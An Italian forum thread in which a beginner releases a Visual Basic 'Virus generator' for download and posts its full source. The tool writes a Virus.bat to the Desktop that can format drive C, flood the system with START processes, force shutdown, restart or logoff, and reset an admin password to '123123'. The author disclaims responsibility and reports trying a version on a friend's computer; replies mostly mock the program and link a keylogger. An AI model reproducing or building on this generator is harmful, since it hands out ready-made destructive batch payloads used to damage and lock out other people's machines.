• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Release Generator Batch v1.0

Simba

Utente Assiduo
Autore del topic
9 Aprile 2012
553
0
Miglior risposta
0
Salve sciaxini, ieri mi sono messo in testa di fare un generatore di codici batch.
Questo è il mio primo programma in Visual basic 2010.


Commenti:
Il programma per alcuni è inutile.
Grafica è stata fatta abbastanza bene, si poteva far di meglio.
Ripeto è il mio primo programma quindi anche se per molti di voi è facile farlo per me non lo è stato da ieri sera che ci lavoro.
Accetto qualsisasi tipo di commento apparte insulti inutili, SOLO critiche costruttive.

Screen:
0261a-b4a2aa39-7586-4ba8-b76c-2d0a8574ecc4.png


Scansione:
Perfavore, Entra oppure Registrati per vedere i Link!

Vengono rilevati 5/42 virus, credo che il motivo sia che il generator produce file maligni, ma premetto che non è un trojan, rat, o roba simile.

Download:
Perfavore, Entra oppure Registrati per vedere i Link!



Sotto richiesta ecco la Source:
Imports System.IO.File

Public Class Form2


Dim scrivi As System.IO.StreamWriter




Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If CheckBox1.Checked = True Then
TextBox1.Text = TextBox1.Text + "format C: /autotest /q /u" + vbCrLf
MsgBox("Hai selezionato formatta PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox2.Checked = True Then
TextBox1.Text = TextBox1.Text + "START" + vbCrLf + "START" + vbCrLf + "START" + vbCrLf + "START"
MsgBox("Hai selezionato impalla PC [Clicca tasto destro sul Virus->Modifica->Aggiungi altri Start per renderlo più potente!", MsgBoxStyle.Information, "Virus generator")


End If
If CheckBox3.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -s -f" + vbCrLf
MsgBox("Hai selezionato spegni PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox4.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -r -f" + vbCrLf
MsgBox("Hai selezionato Riavvia PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox5.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -l -f" + vbCrLf
MsgBox("Hai selezionato disconnetti utente PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox6.Checked = True Then
TextBox1.Text = TextBox1.Text + "DISATTIVA FIREWALL" + vbCrLf
MsgBox("Hai selezionato DISATTIVA FIREWALL", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox7.Checked = True Then
TextBox1.Text = TextBox1.Text + "@net user admin 123123" + vbCrLf
MsgBox("Hai selezionato cambia password Utente PC in : 123123", MsgBoxStyle.Information, "Virus generator")
End If
If MsgBox("Il Virus è stato generato con successo! Controlla nel tuo DeskTop!", MsgBoxStyle.Information, "Virus generator") Then


End If


scrivi = System.IO.File.AppendText(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) & "\Virus.bat")
scrivi.WriteLine(TextBox1.Text)
scrivi.Close()
TextBox1.Text = ""
TextBox1.Text = ""
End Sub


Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
MsgBox("Hai appena aperto il Virus generator, ricorda di non usare più effetti o il virus non funzionerà! PS : NON mi assumo nessuna responsabilità dell'uso che ne farai, se accetti queste condizioni clicca si.", MsgBoxStyle.YesNo, "Virus generator")
End Sub


Private Sub CheckBox7_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs)


End Sub
End Class



CREATO DA : ME
Fatemi sapere cosa ne pensate !


Scusate per il per il periodo di tempo con link non funzionante, ora potete scaricare il generatore e usarlo (tutti i comandi fungono adesso, anche la source è funzionante PS: Lo screen non è aggiornato ho aggiunto un nuovo comando.Scusate per la presunzione (per alcuni autori dei commenti)nell'impalla pc dopo che lo generate cliccate tasto destro su di esso>Modifica e aggiungete più "START" a capo ancora "START" più volte scriverete "START" ecc... Più il computer si impallerà, l'ho provato sul mio pc chiudendo tutto e aprendo solo questo file mi si sono aperti 2000 processi. P.S.S : Se non riuscite a più a chiudere i CMD che si apriranno disconnettete utente).






 
Ultima modifica:
Riferimento: Generator Batch v1.0

"Virtual basic 2010"???? :shock:
 
Riferimento: Generator Batch v1.0

Era automatica la mia lettura e leggevo bene "Visual" comunque aggiustato, riguardo al Generator cosa ne pensate?
 
Riferimento: Generator Batch v1.0

"Grafica è stata fatta abbastanza bene, si poteva far di meglio." ????????????
Hai messo solo uno sfondo e hai fatto la grafica??? :|
 
Riferimento: Generator Batch v1.0

Salve sciaxini, ieri mi sono messo in testa di fare un generatore di codici batch.
Questo è il mio primo programma in Visual basic 2010.


Commenti:
Il programma per alcuni è inutile.
Grafica è stata fatta abbastanza bene, si poteva far di meglio.
Ripeto è il mio primo programma quindi anche se per molti di voi è facile farlo per me non lo è stato da ieri sera che ci lavoro.
Accetto qualsisasi tipo di commento apparte insulti inutili, SOLO critiche costruttive.

Screen:
0261a-b4a2aa39-7586-4ba8-b76c-2d0a8574ecc4.png


Scansione:
Perfavore, Entra oppure Registrati per vedere i Link!

Vengono rilevati 5/42 virus, credo che il motivo sia che il generator produce file maligni, ma premetto che non è un trojan, rat, o roba simile.

Download:
Perfavore, Entra oppure Registrati per vedere i Link!


CREATO DA : ME
Fatemi sapere cosa ne pensate !







La grafica non mi piace (non è proprio da buttare), guarda la grafica del mio keylogger: http://www.sciax2.it/forum/programmazione/encounter-ftp-keylogger-517208.html, potresti fare una cosa simile, fai un form borderless e lo riempi di immagini, con speedbutton vari.
 
Riferimento: Generator Batch v1.0

La grafica non mi piace (non è proprio da buttare), guarda la grafica del mio keylogger: http://www.sciax2.it/forum/programmazione/encounter-ftp-keylogger-517208.html, potresti fare una cosa simile, fai un form borderless e lo riempi di immagini, con speedbutton vari.
Grazie dell'input comunque è stata fatta come esercizio come ho già detto è il mio primo progetto in Vb...
Grazie a tutti per i complimenti e per il resto, so benissimo che la grafica è da 2/10, cercherò di migliorare al mio prossimo progetto !

--------------- AGGIUNTA AL POST ---------------
Si potrebbe leggere il source code?

Si certamente, aggiungo !
 
Ultima modifica:
Riferimento: Generator Batch v1.0

Grazie dell'input comunque è stata fatta come esercizio come ho già detto è il mio primo progetto in Vb...
Grazie a tutti per i complimenti e per il resto, so benissimo che la grafica è da 2/10, cercherò di migliorare al mio prossimo progetto !

--------------- AGGIUNTA AL POST ---------------


Si certamente, aggiungo !
Secondo me hai sbagliato a postare il source ...
Sei sicuro di averlo realizzato te ????
Noto una certa somiglianza a questa guida che è stata pubblicata un mese prima del tuo programma! http://www.sciax2.it/forum/visual-basic/vbulletin-creare-generatore-file-bat-370203.html

Ti tengo d'occhi ! :mmm:
--------------- AGGIUNTA AL POST ---------------
Grazie dell'input comunque è stata fatta come esercizio come ho già detto è il mio primo progetto in Vb...
Grazie a tutti per i complimenti e per il resto, so benissimo che la grafica è da 2/10, cercherò di migliorare al mio prossimo progetto !

--------------- AGGIUNTA AL POST ---------------


Si certamente, aggiungo !
Secondo me hai sbagliato a postare il source ...
Sei sicuro di averlo realizzato te ????
Noto una certa somiglianza a questa guida che è stata pubblicata un mese prima del tuo programma! http://www.sciax2.it/forum/visual-basic/vbulletin-creare-generatore-file-bat-370203.html

Ti tengo d'occhio ! :mmm:
 
Ultima modifica:
Riferimento: Generator Batch v1.0

Già il solo leggere il testo delle CheckBox mi fa raddrizzare i capelli...
 
Riferimento: Generator Batch v1.0

Formatta pc ?
Quindi tu, attraverso un file .bat riusciresti a cancellare tutti (perchè è appunto una formattazione) i file del pc, anche (E soprattutto) quelli di windows, che però è ciò che fa funzionare i file con estensione .bat, senza contare che comunque i file di sistema sono in uso quindi non puoi cancellarli, detto questo, che scopo ha secondo te tale funzione ?
 
Riferimento: Generator Batch v1.0

Allora vi rispondo a tutti, @xXPaTeXx si ho seguito una guida, come detto in precendenza è il mio primo programma, per il resto impalla pc so benissimo che non potrebbe con il comando : "Start" ma non sapevo cosa altro scrivere e non ho modificato, e so benissimo che le CheckBox so strane, ma la mia è stata una prova per allenarmi, quindi scusate per gli errori e per le stupidagini. @XFossaDeiLeoniX @System32
 
Riferimento: Generator Batch v1.0

Sul formatta pc, vero? xD
Beh ahahahah vi dò ragione anche se è mio il topic, è una cosa più che stupida ma comunque sia, ripeto dovevo provare so benissimo che è una CAZZATA xD
 
Riferimento: Generator Batch v1.0

megasesso.com?
Scusa eh ma che centra U.U
lol
 
Riferimento: Generator Batch v1.0

megasesso.com?
Scusa eh ma che centra U.U
lol
Ahaahahah è l'impalla pc non impalla proprio il pc forse se le pagine di megasesso.com sarebbero molteplici come ho già provato sul mio amico ed ha funzionato forse il PC s'impalla per esempio dal mio amico gli si è spento il computer ma siccome nel Generatore sono 3 le pagine aperte il pc non avrà nessun problema sarebbe bello solo se lì davanti passasse qualcuno ... Eccoti spiegata la ragione :emoji_smiley: